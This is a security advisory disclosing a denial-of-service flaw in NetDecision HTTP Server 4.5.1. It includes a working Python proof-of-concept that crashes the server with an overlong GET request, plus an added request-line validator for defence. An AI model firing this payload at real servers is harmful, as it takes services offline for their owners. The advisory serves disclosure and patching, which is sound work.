##############################################################################
#
# Title    : Netmechanica NetDecision HTTP Server Denial Of Service Vulnerability
# Author   : Prabhu S Angadi SecPod Technologies (www.secpod.com)
# Vendor   : http://www.netmechanica.com
# Advisory : http://secpod.org/blog/?p=484
#            http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt
#            http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py
# Software : Netmechanica NetDecision HTTP Server version 4.5.1
# Date     : 05/12/2011
#
###############################################################################

SecPod ID: 1040

05/12/2011 Issue Discovered
21/02/2012 Vendor Notified
22/02/2012 Vendor Acknowledge
24/02/2012 Issue Resolved

Class: Denial Of Service
Severity: Medium

Overview:
---------
Netmechanica NetDecision HTTP Server version 4.5.1 is prone to a denial of
service vulnerability.

Technical Description:
----------------------
The vulnerability is caused due to improper validation of long malicious HTTP
request to web server, which allows remote attackers to crash the service.

Impact:
--------
Successful exploitation could allow an attacker to cause denial of service
condition.

Affected Software:
------------------
Netmechanica NetDecision 4.5.1 (full package) containing HTTP Server
version 4.5.1

Tested on:
-----------
Netmechanica NetDecision 4.5.1 (full package) containing HTTP Server
version 4.5.1 on Windows XP SP3 & Win XP2.

Older versions might be affected.

References:
-----------
http://secpod.org/blog/?p=484
http://www.netmechanica.com/downloads
http://www.netmechanica.com/news/?news_id=26

Proof of Concept:
----------------
http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py

Vendor URL:
----------------
http://www.netmechanica.com
http://www.netmechanica.com/news/?news_id=26

Solution:
----------
Upgrade to NetDecision 4.6.1

Risk Factor:
-------------
CVSS Score Report:
    ACCESS_VECTOR          = NETWORK
    ACCESS_COMPLEXITY      = LOW
    AUTHENTICATION         = NOT_REQUIRED
    CONFIDENTIALITY_IMPACT = NONE
    INTEGRITY_IMPACT       = NONE
    AVAILABILITY_IMPACT    = PARTIAL
    EXPLOITABILITY         = PROOF_OF_CONCEPT
    REMEDIATION_LEVEL      = UNAVAILABLE
    REPORT_CONFIDENCE      = CONFIRMED
    CVSS Base Score        = 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
    Risk factor            = Medium

Credits:
--------
Prabhu S Angadi of SecPod Technologies has been credited with the discovery of
this vulnerability.


#!/usr/bin/python
##############################################################################
#
# Title    : Netmechanica NetDecision HTTP Server Denial Of Service Vulnerability
# Author   : Prabhu S Angadi SecPod Technologies (www.secpod.com)
# Vendor   : http://www.netmechanica.com
# Advisory : http://secpod.org/blog/?p=484
#            http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt
#            http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py
# Software : Netmechanica NetDecision HTTP Server version 4.5.1
# Date     : 05/12/2011
#
###############################################################################

import socket,sys,time

if len(sys.argv) < 2:
    print "\t[-] Usage: python SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py target_ip"
    print "\t[-] Example : python SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py 127.0.0.1"
    print "\t[-] Exiting..."
    sys.exit(0)

port = 80
target = sys.argv[1]

try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)

try:
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.connect((target,port))
except:
    print "socket() failed: Server is not running"
    sys.exit(1)

exploit = "GET "+ "A"*1276 + "\r\n" + "\r\n"

print "HTTP GET request with long filename triggers the vulnerability"
data = exploit
sock.sendto(data, (target, port))
time.sleep(5)
print "[+] Please verify the server daemon port, it must be down...."
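
The Technical Description above attributes the crash to a long HTTP request that is not validated. The Python 3 code below is an added example, not part of the advisory or of NetDecision's code: a bounded request-line check of the kind a server or front-end proxy can apply before parsing. The 1024-byte limit, the method allow-list, the origin-server assumption and all function names are assumptions made for illustration.

```python
import io

MAX_REQUEST_LINE = 1024  # assumed limit, in bytes, including the trailing CRLF
METHODS = {b"GET", b"HEAD", b"POST", b"PUT", b"DELETE", b"OPTIONS"}  # assumed allow-list

def check_request_line(stream, limit=MAX_REQUEST_LINE):
    """Validate the first line of an HTTP/1.x request read from a binary stream.

    Returns (status, reason); only status 200 should reach the real handler.
    """
    # Bounded read: at most limit+1 bytes are buffered, however long the line is.
    line = stream.readline(limit + 1)
    if len(line) > limit:
        return 414, "request line longer than %d bytes" % limit
    if not line.endswith(b"\r\n"):
        return 400, "request line not terminated by CRLF"
    parts = line[:-2].split(b" ")
    if len(parts) != 3:
        return 400, "expected 'METHOD target HTTP-version'"
    method, target, version = parts
    if method not in METHODS:
        return 501, "method not allowed"
    if version not in (b"HTTP/1.0", b"HTTP/1.1"):
        return 400, "unsupported HTTP version"
    # Assumes an origin server, so only origin-form targets and '*' are accepted.
    if not (target.startswith(b"/") or target == b"*"):
        return 400, "target must be origin-form or '*'"
    return 200, "ok"

def check_bytes(raw, limit=MAX_REQUEST_LINE):
    """Convenience wrapper for captured bytes; for a socket use sock.makefile('rb')."""
    return check_request_line(io.BytesIO(raw), limit)

# Constructed inputs: one with the shape described in the advisory, one ordinary.
LONG_REQUEST = b"GET " + b"A" * 1276 + b"\r\n\r\n"
NORMAL_REQUEST = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"

if __name__ == "__main__":
    for name, raw in (("long", LONG_REQUEST), ("normal", NORMAL_REQUEST)):
        print(name, check_bytes(raw))
    # With a larger limit the long request is still refused, as malformed.
    print("long, limit=4096", check_bytes(LONG_REQUEST, 4096))
```

The length check runs before any splitting or copying, so the oversized line is refused with 414 without being held in full; raising the limit does not let it through either, because it has no HTTP version field.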